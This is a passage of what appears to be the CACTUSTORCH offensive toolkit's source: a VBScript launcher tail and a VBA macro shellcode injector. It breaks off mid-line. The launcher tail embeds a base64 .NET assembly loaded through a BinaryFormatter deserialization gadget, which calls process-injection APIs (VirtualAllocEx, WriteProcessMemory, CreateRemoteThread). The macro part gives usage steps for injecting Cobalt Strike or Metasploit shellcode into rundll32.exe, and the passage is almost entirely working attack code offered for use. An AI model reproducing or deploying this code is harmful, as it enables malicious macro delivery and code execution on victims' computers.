"MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BgcAAAAH" 70 | s = s & "dGFyZ2V0MAkGAAAABgkAAAAPU3lzdGVtLkRlbGVnYXRlBgoAAAANRHluYW1pY0ludm9rZQoEAwAA" 71 | s = s & "ACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQd0YXJnZXQw" 72 | s = s & "B21ldGhvZDADBwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVu" 73 | s = s & "dHJ5Ai9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgkLAAAA" 74 | s = s & "CQwAAAAJDQAAAAQEAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9u" 75 | s = s & "SG9sZGVyBgAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0dXJlCk1lbWJlclR5" 76 | s = s & "cGUQR2VuZXJpY0FyZ3VtZW50cwEBAQEAAwgNU3lzdGVtLlR5cGVbXQkKAAAACQYAAAAJCQAAAAYR" 77 | s = s & "AAAALFN5c3RlbS5PYmplY3QgRHluYW1pY0ludm9rZShTeXN0ZW0uT2JqZWN0W10pCAAAAAoBCwAA" 78 | s = s & "AAIAAAAGEgAAACBTeXN0ZW0uWG1sLlNjaGVtYS5YbWxWYWx1ZUdldHRlcgYTAAAATVN5c3RlbS5Y" 79 | s = s & "bWwsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdh" 80 | s = s & "NWM1NjE5MzRlMDg5BhQAAAAHdGFyZ2V0MAkGAAAABhYAAAAaU3lzdGVtLlJlZmxlY3Rpb24uQXNz" 81 | s = s & "ZW1ibHkGFwAAAARMb2FkCg8MAAAAAB4AAAJNWpAAAwAAAAQAAAD//wAAuAAAAAAAAABAAAAAAAAA" 82 | s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAADh+6DgC0Cc0huAFMzSFUaGlzIHByb2dy" 83 | s = s & "YW0gY2Fubm90IGJlIHJ1biBpbiBET1MgbW9kZS4NDQokAAAAAAAAAFBFAABMAQMAWIaiWgAAAAAA" 84 | s = s & "AAAA4AAiIAsBMAAAFgAAAAYAAAAAAADuNQAAACAAAABAAAAAAAAQACAAAAACAAAEAAAAAAAAAAQA" 85 | s = s & "AAAAAAAAAIAAAAACAAAAAAAAAwBAhQAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAAnDUA" 86 | s = s & "AE8AAAAAQAAAkAMAAAAAAAAAAAAAAAAAAAAAAAAAYAAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" 87 | s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAIAAAAAAAAAAAAAAAIIAAASAAAAAAAAAAA" 88 | s = s & "AAAALnRleHQAAAD0FQAAACAAAAAWAAAAAgAAAAAAAAAAAAAAAAAAIAAAYC5yc3JjAAAAkAMAAABA" 89 | s = s & "AAAABAAAABgAAAAAAAAAAAAAAAAAAEAAAEAucmVsb2MAAAwAAAAAYAAAAAIAAAAcAAAAAAAAAAAA" 90 | s = s & "AAAAAABAAABCAAAAAAAAAAAAAAAAAAAAANA1AAAAAAAASAAAAAIABQAMIgAAkBMAAAEAAAAAAAAA" 91 | s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgIoDwAACioT" 92 | s = s & "MAoAHAEAAAEAABEEKBAAAAoKEgEGjmkoEQAACnMKAAAGDAgWfTUAAARyAQAAcBMEcgMAAHAoEgAA" 93 | s = s & "Cm8TAAAKFjEZch0AAHAoEgAACnIrAABwAygUAAAKEwQrF3IdAABwKBIAAApyQQAAcAMoFAAAChME" 94 | s = s & "EQQUFBQXGn4VAAAKFAgSAygBAAAGJgl7BAAABBMFEgUoFgAACnJXAABwKBcAAAo5gAAAABEFFnMR" 95 | s = s & "AAAKByAAMAAAGigCAAAGEwYSBigWAAAKclcAAHAoGAAACiwKEQUWKAUAAAYmKhYTBxIIBo5pKBEA" 96 | s = s & "AAoRBREGBhEIEQcoBAAABiYRBREGBx8gFnMRAAAKKAMAAAYmEQUWcxEAAAoWEQYWcxEAAAoWFnMR" 97 | s = s & "AAAKKAYAAAYmKnoCfhUAAAp9AgAABAIoDwAACgICKBkAAAp9AQAABCoAEzACAGAAAAAAAAAAAn4V" 98 | s = s & "AAAKfSsAAAQCfhUAAAp9LAAABAJ+FQAACn0tAAAEAn4VAAAKfTgAAAQCfhUAAAp9OQAABAJ+FQAA" 99 | s = s & "Cn06AAAEAn4VAAAKfTsAAAQCKA8AAAoCAigZAAAKfSoAAAQqQlNKQgEAAQAAAAAADAAAAHYyLjAu" 100 | s = s & "NTA3MjcAAAAABQBsAAAAXAcAACN+AADIBwAAdAkAACNTdHJpbmdzAAAAADwRAABcAAAAI1VTAJgR" 101 | s = s & "AAAQAAAAI0dVSUQAAACoEQAA6AEAACNCbG9iAAAAAAAAAAIAAAFXHQIUCQIAAAD6ATMAFgAAAQAA" 102 | s = s & "ABcAAAAJAAAAUAAAAAoAAAAkAAAAGQAAADMAAAASAAAAAQAAAAEAAAAGAAAAAQAAAAEAAAAHAAAA" 103 | s = s & "AACZBgEAAAAAAAYAXAWSBwYAyQWSBwYAigRgBw8AsgcAAAYAsgThBgYAMAXhBgYAEQXhBgYAsAXh" 104 | s = s & "BgYAfAXhBgYAlQXhBgYAyQThBgYAngRzBwYAfARzBwYA9AThBgYAqwipBgYAYQSpBgYATQWpBgYA" 105 | s = s & "sAapBgYA5AipBgYAWQepBgYA2AipBgYAZgapBgYAhAZzBwAAAAAlAAAAAAABAAEAAQAQAG0GAAA9" 106 | s = s & "AAEAAQAKABAA+AcAAD0AAQAJAAoBEADOBgAAQQAEAAoAAgEAABsIAABJAAgACgACAQAANggAAEkA" 107 | s = s & "JwAKAAoAEAAGBwAAPQAqAAoAAgEAAG0EAABJADwACwACAQAA8wYAAEkARQALAAYAfQb6AAYARAc/" 108 | s = s & "AAYAJAT9AAYAdAg/AAYA5wM/AAYAyAP6AAYAvQP6AAYGngMAAVaAsgIDAVaAwAIDAVaAZAADAVaA" 109 | s = s & "iAIDAVaAwgADAVaAUwIDAVaA8QEDAVaAHQIDAVaABQIDAVaAoAEDAVaAAgMDAVaAXgEDAVaASAED" 110 | s = s & "AVaA4QEDAVaATQIDAVaAMQIDAVaAagMDAVaAggMDAVaAmQIDAVaAHQMDAVaAdgEDAVaAdQADAVaA" 111 | s = s & "PQADAVaAJwEDAVaAqAADAVaAOgMDAVaAuQEDAVaAGAEDAVaAxgEDAVaA5QIDAQYGngMAAVaAkQAH" 112 | s = s & "AVaAcgIHAQYApgP6AAYA7wM/AAYAFwc/AAYAMwQ/AAYASwP6AAYAmgP6AAYA5wX6AAYA7wX6AAYA" 113 | s = s & "Rwj6AAYAVQj6AAYA5AT6AAYALgj6AAYAAQkLAQYADQALAQYAGQA/AAYA7Ag/AAYA9gg/AAYANAc/" 114 | s = s & "AAYGngMAAVaA3gIOAVaA7wAOAVaAnQEOAVaA2AIOAVaA1QEOAVaADwEOAVaAlAEOAVaAAwEOAQYG" 115 | s = s & "ngMAAVaA5wASAVaAVwASAVaA1QASAVaAWAMSAVaAaQISAVaATwMSAVaA3QASAVaAYAMSAVaAEQYS" 116 | s = s & "AVaAJAYSAVaAOQYSAQAAAACAAJYgLgAWAQEAAAAAAIAAliANCSoBCwAAAAAAgACWIBwJNQEQAAAA" 117 | s = s & "AACAAJYgNAk/ARUAAAAAAIAAliBjCEkBGgAAAAAAgACRINQDTwEcAFAgAAAAAIYYPgcGACMAWCAA" 118 | s = s & "AAAAhgBNBFoBIwCAIQAAAACGGD4HBgAlAKAhAAAAAIYYPgcGACUAAAABADsEAAACAFMEAAADAOQH" 119 | s = s & "AAAEANEHAAAFAMEHAAAGAAsIAAAHANYIAAAIAEcJAQAJAAQHAgAKAMwGAAABABsEAAACAIsIAAAD" 120 | s = s & "AAMGAAAEAGsEAAAFAL8IAAABABsEAAACAIsIAAADAAMGAAAEAMkIAAAFALIIAAABAHQIAAACAH0I" 121 | s = s & "AAADACEHAAAEAAMGAAAFALUGAAABAHQIAAACAPoDAAABAHQIAAACANEHAAADAPcFAAAEAJUIAAAF" 122 | s = s & "ACgHAAAGAAsIAAAHALIDAAABAC0JAAACAAEACQA+BwEAEQA+BwYAGQA+BwoAKQA+BxAAMQA+BxAA" 123 | s = s & "OQA+BxAAQQA+BxAASQA+BxAAUQA+BxAAWQA+BxAAYQA+BxUAaQA+BxAAcQA+BxAAiQA+BwYAeQA+" 124 | s = s & "BwYAmQBTBikAoQA+BwEAqQAEBC8AsQB5BjQAsQCkCDgAoQASBz8AoQBkBkIAsQBmCUYAsQBaCUYA" 125 | s = s & "uQAKBkwACQAkAFoACQAoAF8ACQAsAGQACQAwAGkACQA0AG4ACQA4AHMACQA8AHgACQBAAH0ACQBE" 126 | s = s & "AIIACQBIAIcACQBMAIwACQBQAJEACQBUAJYACQBYAJsACQBcAKAACQBgAKUACQBkAKoACQBoAK8A" 127 | s = s & "CQBsALQACQBwALkACQB0AL4ACQB4AMMACQB8AMgACQCAAM0ACQCEANIACQCIANcACQCMANwACQCQ" 128 | s = s & "AOEACQCUAOYACQCYAOsACQCgAFoACQCkAF8ACQD0AJYACQD4AJsACQD8APAACQAAAbkACQAEAeEA" 129 | s = s & "CQAIAfUACQAMAb4ACQAQAcMACQAYAW4ACQAcAXMACQAgAXgACQAkAX0ACQAoAVoACQAsAV8ACQAw" 130 | s = s & "AWQACQA0AWkACQA4AYIACQA8AYcACQBAAYwALgALAGABLgATAGkBLgAbAIgBLgAjAJEBLgArAJEB" 131 | s = s & "LgAzAKIBLgA7AKIBLgBDAJEBLgBLAJEBLgBTAKIBLgBbAKgBLgBjAK4BLgBrANgBQwBbAKgBowBz" 132 | s = s & "AFoAwwBzAFoAAwFzAFoAIwFzAFoAGgCMBgABAwAuAAEAAAEFAA0JAQAAAQcAHAkBAAABCQA0CQEA" 133 | s = s & "AAELAGMIAQAAAQ0A1AMBAASAAAABAAAAAAAAAAAAAAAAAPcAAAACAAAAAAAAAAAAAABRAKkDAAAA" 134 | s = s & "AAMAAgAEAAIABQACAAYAAgAHAAIACAACAAkAAgAAAAAAAHNoZWxsY29kZTMyAGNiUmVzZXJ2ZWQy" 135 | s = s & "AGxwUmVzZXJ2ZWQyADxNb2R1bGU+AENyZWF0ZVByb2Nlc3NBAENSRUFURV9CUkVBS0FXQVlfRlJP" 136 | s = s & "TV9KT0IARVhFQ1VURV9SRUFEAENSRUFURV9TVVNQRU5ERUQAUFJPQ0VTU19NT0RFX0JBQ0tHUk9V" 137 | s = s & "TkRfRU5EAERVUExJQ0FURV9DTE9TRV9TT1VSQ0UAQ1JFQVRFX0RFRkFVTFRfRVJST1JfTU9ERQBD" 138 | s = s & "UkVBVEVfTkVXX0NPTlNPTEUARVhFQ1VURV9SRUFEV1JJVEUARVhFQ1VURQBSRVNFUlZFAENBQ1RV" 139 | s = s & "U1RPUkNIAFdSSVRFX1dBVENIAFBIWVNJQ0FMAFBST0ZJTEVfS0VSTkVMAENSRUFURV9QUkVTRVJW" 140 | s = s & "RV9DT0RFX0FVVEhaX0xFVkVMAENSRUFURV9TSEFSRURfV09XX1ZETQBDUkVBVEVfU0VQQVJBVEVf" 141 | s = s & "V09XX1ZETQBQUk9DRVNTX01PREVfQkFDS0dST1VORF9CRUdJTgBUT1BfRE9XTgBHTwBDUkVBVEVf" 142 | s = s & "TkVXX1BST0NFU1NfR1JPVVAAUFJPRklMRV9VU0VSAFBST0ZJTEVfU0VSVkVSAExBUkdFX1BBR0VT" 143 | s = s & "AENSRUFURV9GT1JDRURPUwBJRExFX1BSSU9SSVRZX0NMQVNTAFJFQUxUSU1FX1BSSU9SSVRZX0NM" 144 | s = s & "QVNTAEhJR0hfUFJJT1JJVFlfQ0xBU1MAQUJPVkVfTk9STUFMX1BSSU9SSVRZX0NMQVNTAEJFTE9X" 145 | s = s & "X05PUk1BTF9QUklPUklUWV9DTEFTUwBOT0FDQ0VTUwBEVVBMSUNBVEVfU0FNRV9BQ0NFU1MAREVU" 146 | s = s & "QUNIRURfUFJPQ0VTUwBDUkVBVEVfUFJPVEVDVEVEX1BST0NFU1MAREVCVUdfUFJPQ0VTUwBERUJV" 147 | s = s & "R19PTkxZX1RISVNfUFJPQ0VTUwBSRVNFVABDT01NSVQAQ1JFQVRFX0lHTk9SRV9TWVNURU1fREVG" 148 | s = s & "QVVMVABDUkVBVEVfVU5JQ09ERV9FTlZJUk9OTUVOVABFWFRFTkRFRF9TVEFSVFVQSU5GT19QUkVT" 149 | s = s & "RU5UAENSRUFURV9OT19XSU5ET1cAZHdYAFJFQURPTkxZAEVYRUNVVEVfV1JJVEVDT1BZAElOSEVS" 150 | s = s & "SVRfUEFSRU5UX0FGRklOSVRZAElOSEVSSVRfQ0FMTEVSX1BSSU9SSVRZAGR3WQB2YWx1ZV9fAGNi" 151 | s = s & "AG1zY29ybGliAGxwVGhyZWFkSWQAZHdUaHJlYWRJZABkd1Byb2Nlc3NJZABDcmVhdGVSZW1vdGVU" 152 | s = s & "aHJlYWQAaFRocmVhZABscFJlc2VydmVkAHVFeGl0Q29kZQBHZXRFbnZpcm9ubWVudFZhcmlhYmxl" 153 | s = s & "AGxwSGFuZGxlAGJJbmhlcml0SGFuZGxlAGxwVGl0bGUAbHBBcHBsaWNhdGlvbk5hbWUAZmxhbWUA" 154 | s = s & "bHBDb21tYW5kTGluZQBWYWx1ZVR5cGUAZmxBbGxvY2F0aW9uVHlwZQBHdWlkQXR0cmlidXRlAERl" 155 | s = s & "YnVnZ2FibGVBdHRyaWJ1dGUAQ29tVmlzaWJsZUF0dHJpYnV0ZQBBc3NlbWJseVRpdGxlQXR0cmli" 156 | s = s & "dXRlAEFzc2VtYmx5VHJhZGVtYXJrQXR0cmlidXRlAGR3RmlsbEF0dHJpYnV0ZQBBc3NlbWJseUZp" 157 | s = s & "bGVWZXJzaW9uQXR0cmlidXRlAEFzc2VtYmx5Q29uZmlndXJhdGlvbkF0dHJpYnV0ZQBBc3NlbWJs" 158 | s = s & "eURlc2NyaXB0aW9uQXR0cmlidXRlAEZsYWdzQXR0cmlidXRlAENvbXBpbGF0aW9uUmVsYXhhdGlv" 159 | s = s & "bnNBdHRyaWJ1dGUAQXNzZW1ibHlQcm9kdWN0QXR0cmlidXRlAEFzc2VtYmx5Q29weXJpZ2h0QXR0" 160 | s = s & "cmlidXRlAEFzc2VtYmx5Q29tcGFueUF0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJp" 161 | s = s & "YnV0ZQBkd1hTaXplAGR3WVNpemUAZHdTdGFja1NpemUAZHdTaXplAFNpemVPZgBHVUFSRF9Nb2Rp" 162 | s = s & "ZmllcmZsYWcATk9DQUNIRV9Nb2RpZmllcmZsYWcAV1JJVEVDT01CSU5FX01vZGlmaWVyZmxhZwBG" 163 | s = s & "cm9tQmFzZTY0U3RyaW5nAFRvU3RyaW5nAGNhY3R1c1RvcmNoAGdldF9MZW5ndGgATWFyc2hhbABr" 164 | s = s & "ZXJuZWwzMi5kbGwAQ0FDVFVTVE9SQ0guZGxsAFN5c3RlbQBFbnVtAGxwTnVtYmVyT2ZCeXRlc1dy" 165 | s = s & "aXR0ZW4AbHBQcm9jZXNzSW5mb3JtYXRpb24AU3lzdGVtLlJlZmxlY3Rpb24ATWVtb3J5UHJvdGVj" 166 | s = s & "dGlvbgBscFN0YXJ0dXBJbmZvAFplcm8AbHBEZXNrdG9wAGJ1ZmZlcgBscFBhcmFtZXRlcgBoU3Rk" 167 | s = s & "RXJyb3IALmN0b3IAbHBTZWN1cml0eURlc2NyaXB0b3IASW50UHRyAFN5c3RlbS5EaWFnbm9zdGlj" 168 | s = s & "cwBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJT" 169 | s = s & "ZXJ2aWNlcwBEZWJ1Z2dpbmdNb2RlcwBiSW5oZXJpdEhhbmRsZXMAbHBUaHJlYWRBdHRyaWJ1dGVz" 170 | s = s & "AGxwUHJvY2Vzc0F0dHJpYnV0ZXMAU2VjdXJpdHlBdHRyaWJ1dGVzAGR3Q3JlYXRpb25GbGFncwBD" 171 | s = s & "cmVhdGVQcm9jZXNzRmxhZ3MAZHdGbGFncwBEdXBsaWNhdGVPcHRpb25zAGR3WENvdW50Q2hhcnMA" 172 | s = s & "ZHdZQ291bnRDaGFycwBUZXJtaW5hdGVQcm9jZXNzAGhQcm9jZXNzAGxwQmFzZUFkZHJlc3MAbHBB" 173 | s = s & "ZGRyZXNzAGxwU3RhcnRBZGRyZXNzAENvbmNhdABPYmplY3QAZmxPbGRQcm90ZWN0AGZsUHJvdGVj" 174 | s = s & "dABmbE5ld1Byb3RlY3QAbHBFbnZpcm9ubWVudABDb252ZXJ0AGhTdGRJbnB1dABoU3RkT3V0cHV0" 175 | s = s & "AHdTaG93V2luZG93AFZpcnR1YWxBbGxvY0V4AFZpcnR1YWxQcm90ZWN0RXgAYmluYXJ5AFdyaXRl" 176 | s = s & "UHJvY2Vzc01lbW9yeQBscEN1cnJlbnREaXJlY3RvcnkAb3BfRXF1YWxpdHkAb3BfSW5lcXVhbGl0" 177 | s = s & "eQAAAQAZUAByAG8AZwByAGEAbQBXADYANAAzADIAAA13AGkAbgBkAGkAcgAAFVwAUwB5AHMAVwBP" 178 | s = s & "AFcANgA0AFwAABVcAFMAeQBzAHQAZQBtADMAMgBcAAADMAAAABZi8URz/RpBkHALmYfP+r4ABCAB" 179 | s = s & "AQgDIAABBSABARERBCABAQ4EIAEBAg4HCR0FGBIcERAOGBgIGAUAAR0FDgQAAQ4OAyAACAYAAw4O" 180 | s = s & "Dg4CBhgDIAAOBQACAg4OBAABCBwIt3pcVhk04IkEAQAAAAQCAAAABAQAAAAECAAAAAQQAAAABCAA" 181 | s = s & "AAAEQAAAAASAAAAABAABAAAEAAIAAAQABAAABAAIAAAEABAAAAQAIAAABABAAAAEAIAAAAQAAAEA" 182 | s = s & "BAAAAgAEAAAEAAQAAAgABAAAEAAEAAAgAAQAAAABBAAAAAIEAAAABAQAAAAIBAAAABAEAAAAIAQA" 183 | s = s & "AABABAAAAIAEADAAAAQAAEAAAgYIAgYCAgYJAwYRFAMGERgCBgYDBhEgAwYRJBMAChgODhIMEgwC" 184 | s = s & "ERQYDhIcEBEQCgAFGBgYGBEgESQJAAUYGBgYESQYCQAFAhgYHQUYCAUAAgIYCQoABxgYGAkYGAkY" 185 | s = s & "BSACAQ4OCAEACAAAAAAAHgEAAQBUAhZXcmFwTm9uRXhjZXB0aW9uVGhyb3dzAQgBAAIAAAAAABAB" 186 | s = s & "AAtDQUNUVVNUT1JDSAAABQEAAAAABQEAAQAAKQEAJDU2NTk4ZjFjLTZkODgtNDk5NC1hMzkyLWFm" 187 | s = s & "MzM3YWJlNTc3NwAADAEABzEuMC4wLjAAAAAAAMQ1AAAAAAAAAAAAAN41AAAAIAAAAAAAAAAAAAAA" 188 | s = s & "AAAAAAAAAAAAAADQNQAAAAAAAAAAAAAAAF9Db3JEbGxNYWluAG1zY29yZWUuZGxsAAAAAAD/JQAg" 189 | s = s & "ABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAEAAAABgAAIAAAAAAAAAAAAAAAAAAAAEAAQAA" 190 | s = s & "ADAAAIAAAAAAAAAAAAAAAAAAAAEAAAAAAEgAAABYQAAANAMAAAAAAAAAAAAANAM0AAAAVgBTAF8A" 191 | s = s & "VgBFAFIAUwBJAE8ATgBfAEkATgBGAE8AAAAAAL0E7/4AAAEAAAABAAAAAAAAAAEAAAAAAD8AAAAA" 192 | s = s & "AAAABAAAAAIAAAAAAAAAAAAAAAAAAABEAAAAAQBWAGEAcgBGAGkAbABlAEkAbgBmAG8AAAAAACQA" 193 | s = s & "BAAAAFQAcgBhAG4AcwBsAGEAdABpAG8AbgAAAAAAAACwBJQCAAABAFMAdAByAGkAbgBnAEYAaQBs" 194 | s = s & "AGUASQBuAGYAbwAAAHACAAABADAAMAAwADAAMAA0AGIAMAAAADAADAABAEMAbwBtAG0AZQBuAHQA" 195 | s = s & "cwAAAEMAQQBDAFQAVQBTAFQATwBSAEMASAAAACIAAQABAEMAbwBtAHAAYQBuAHkATgBhAG0AZQAA" 196 | s = s & "AAAAAAAAAEAADAABAEYAaQBsAGUARABlAHMAYwByAGkAcAB0AGkAbwBuAAAAAABDAEEAQwBUAFUA" 197 | s = s & "UwBUAE8AUgBDAEgAAAAwAAgAAQBGAGkAbABlAFYAZQByAHMAaQBvAG4AAAAAADEALgAwAC4AMAAu" 198 | s = s & "ADAAAABAABAAAQBJAG4AdABlAHIAbgBhAGwATgBhAG0AZQAAAEMAQQBDAFQAVQBTAFQATwBSAEMA" 199 | s = s & "SAAuAGQAbABsAAAAPAAMAAEATABlAGcAYQBsAEMAbwBwAHkAcgBpAGcAaAB0AAAAQwBBAEMAVABV" 200 | s = s & "AFMAVABPAFIAQwBIAAAAKgABAAEATABlAGcAYQBsAFQAcgBhAGQAZQBtAGEAcgBrAHMAAAAAAAAA" 201 | s = s & "AABIABAAAQBPAHIAaQBnAGkAbgBhAGwARgBpAGwAZQBuAGEAbQBlAAAAQwBBAEMAVABVAFMAVABP" 202 | s = s & "AFIAQwBIAC4AZABsAGwAAAA4AAwAAQBQAHIAbwBkAHUAYwB0AE4AYQBtAGUAAAAAAEMAQQBDAFQA" 203 | s = s & "VQBTAFQATwBSAEMASAAAADQACAABAFAAcgBvAGQAdQBjAHQAVgBlAHIAcwBpAG8AbgAAADEALgAw" 204 | s = s & "AC4AMAAuADAAAAA4AAgAAQBBAHMAcwBlAG0AYgBsAHkAIABWAGUAcgBzAGkAbwBuAAAAMQAuADAA" 205 | s = s & "LgAwAC4AMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" 206 | s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" 207 | s = s & "AAAAAAAAAAAAAAAAADAAAAwAAADwNQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" 208 | s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" 209 | s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" 210 | s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" 211 | s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" 212 | s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" 213 | s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" 214 | s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" 215 | s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" 216 | s = s & "AAAAAAAAAAAAAAABDQAAAAQAAAAJFwAAAAkGAAAACRYAAAAGGgAAACdTeXN0ZW0uUmVmbGVjdGlv" 217 | s = s & "bi5Bc3NlbWJseSBMb2FkKEJ5dGVbXSkIAAAACgsA" 218 | entry_class = "cactusTorch" 219 | 220 | Dim fmt, al, d, o 221 | Set fmt = CreateObject("System.Runtime.Serialization.Formatters.Binary.BinaryFormatter") 222 | Set al = CreateObject("System.Collections.ArrayList") 223 | al.Add fmt.SurrogateSelector 224 | 225 | Set d = fmt.Deserialize_2(Base64ToStream(s)) 226 | Set o = d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class) 227 | o.flame binary,code 228 | End Sub 229 | 230 | SetVersion 231 | On Error Resume Next 232 | Run 233 | If Err.Number <> 0 Then 234 | Debug Err.Description 235 | Err.Clear 236 | End If -------------------------------------------------------------------------------- /CACTUSTORCH.hta: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /CACTUSTORCH.vba: -------------------------------------------------------------------------------- 1 | ' ( ) ( ) 2 | ' ( ( ( * ) )\ ) * ) ( /( )\ ) ( ( /( 3 | ' )\ )\ )\ ` ) /( ( (()/(` ) /( )\())(()/( )\ )\()) 4 | ' (((_|(((_)( (((_) ( )(_)) )\ /(_))( )(_)|(_)\ /(_)|((_)((_)\ 5 | ' )\___)\ _ )\ )\___(_(_())_ ((_|_)) (_(_()) ((_)(_)) )\___ _((_) 6 | '((/ __(_)_\(_|(/ __|_ _| | | / __||_ _| / _ \| _ ((/ __| || | 7 | ' | (__ / _ \ | (__ | | | |_| \__ \ | | | (_) | /| (__| __ | 8 | ' \___/_/ \_\ \___| |_| \___/|___/ |_| \___/|_|_\ \___|_||_| 9 | ' 10 | ' Author: Vincent Yiu (@vysecurity) 11 | ' Credits: 12 | ' - @cn33liz: Inspiration with StarFighter 13 | ' - @tiraniddo: James Forshaw for DotNet2JScript 14 | ' - @armitagehacker: Raphael Mudge for idea of selecting 32 bit version on 64 bit architecture machines for injection into 15 | 16 | ' A VBA shellcode launcher for Macros. This will spawn a 32 bit version of the binary specified and inject shellcode into it. 17 | ' Macro will not need to declare winapi :) 18 | 19 | ' Usage: 20 | ' Choose a binary you want to inject into, default "rundll32.exe", you can use notepad.exe, calc.exe for example... 21 | ' Generate a 32 bit raw shellcode in whatever framework you want. Tested: Cobalt Strike, Metasploit Framework 22 | ' Run: cat payload.bin | base64 -w 0 > out.txt 23 | ' Run the payload through splitvba: python splitvba.py out.txt code.txt 24 | ' Copy code.txt into the section specified below. 25 | 26 | 27 | Sub SetVersion 28 | Dim shell 29 | Set shell = CreateObject("WScript.Shell") 30 | Dim ver 31 | ver = "v4.0.30319" 32 | On Error Resume Next 33 | shell.RegRead "HKLM\SOFTWARE\\Microsoft\.NETFramework\v4.0.30319\" 34 | If Err.Number <> 0 Then 35 | ver = "v2.0.50727" 36 | Err.Clear 37 | End If 38 | shell.Environment("Process").Item("COMPLUS_Version") = ver 39 | End Sub 40 | 41 | Public binary As String 42 | Public code As String 43 | 44 | Sub Init() 45 | ' Replace with binary name that you want to inject into. This can be anything that exists both in SYSWOW64 and SYSTEM32 46 | binary = "rundll32.exe" 47 | 48 | code = "" 49 | 50 | ' Paste the output from splitvba.py below here 51 | code = code & "TVroAAAAAFtSRVWJ5YHDcoAAAP/TicNXaAQAAABQ/9Bo8LWiVmgFAAAAUP/TAAAAAAAAAAAAAAAAAAAA8AAAAA4fug4AtAnNIbgB" 52 | code = code & "TM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAACf0hwW27NyRduzckXbs3JFZvzkRdqz" 53 | code = code & "ckXF4fZF8rNyRcXh50XIs3JFxeHxRVqzckX8dQlF1LNyRduzc0UGs3JFxeH7RWKzckXF4eBF2rNyRcXh40Xas3JFUmljaNuzckUA" 54 | code = code & "AAAAAAAAAAAAAAAAAAAAUEUAAEwBBQBOViNZAAAAAAAAAADgAAKhCwEJAABCAgAA4gAAAAAAAFFvAQAAEAAAAGACAAAAABAAEAAA" 55 | code = code & "AAIAAAUAAAAAAAAABQAAAAA" 56 | End Sub 57 | 58 | Private Function decodeHex(hex) 59 | On Error Resume Next 60 | Dim DM, EL 61 | Set DM = CreateObject("Microsoft.XMLDOM") 62 | Set EL = DM.createElement("tmp") 63 | EL.DataType = "bin.hex" 64 | EL.Text = hex 65 | decodeHex = EL.NodeTypedValue 66 | End Function 67 | 68 | Function Run() 69 | 70 | On Error Resume Next 71 | 72 | SetVersion 73 | 74 | Dim serialized_obj 75 | serialized_obj = "0001000000FFFFFFFF010000000000000004010000002253797374656D2E44656C656761746553657269616C697A6174696F" 76 | serialized_obj = serialized_obj & "6E486F6C646572030000000844656C65676174650774617267657430076D6574686F64300303033053797374656D2E44656C" 77 | serialized_obj = serialized_obj & "656761746553657269616C697A6174696F6E486F6C6465722B44656C6567617465456E7472792253797374656D2E44656C65" 78 | serialized_obj = serialized_obj & "6761746553657269616C697A6174696F6E486F6C6465722F53797374656D2E5265666C656374696F6E2E4D656D626572496E" 79 | serialized_obj = serialized_obj & "666F53657269616C697A6174696F6E486F6C64657209020000000903000000090400000004020000003053797374656D2E44" 80 | serialized_obj = serialized_obj & "656C656761746553657269616C697A6174696F6E486F6C6465722B44656C6567617465456E74727907000000047479706508" 81 | serialized_obj = serialized_obj & "617373656D626C79067461726765741274617267657454797065417373656D626C790E746172676574547970654E616D650A" 82 | serialized_obj = serialized_obj & 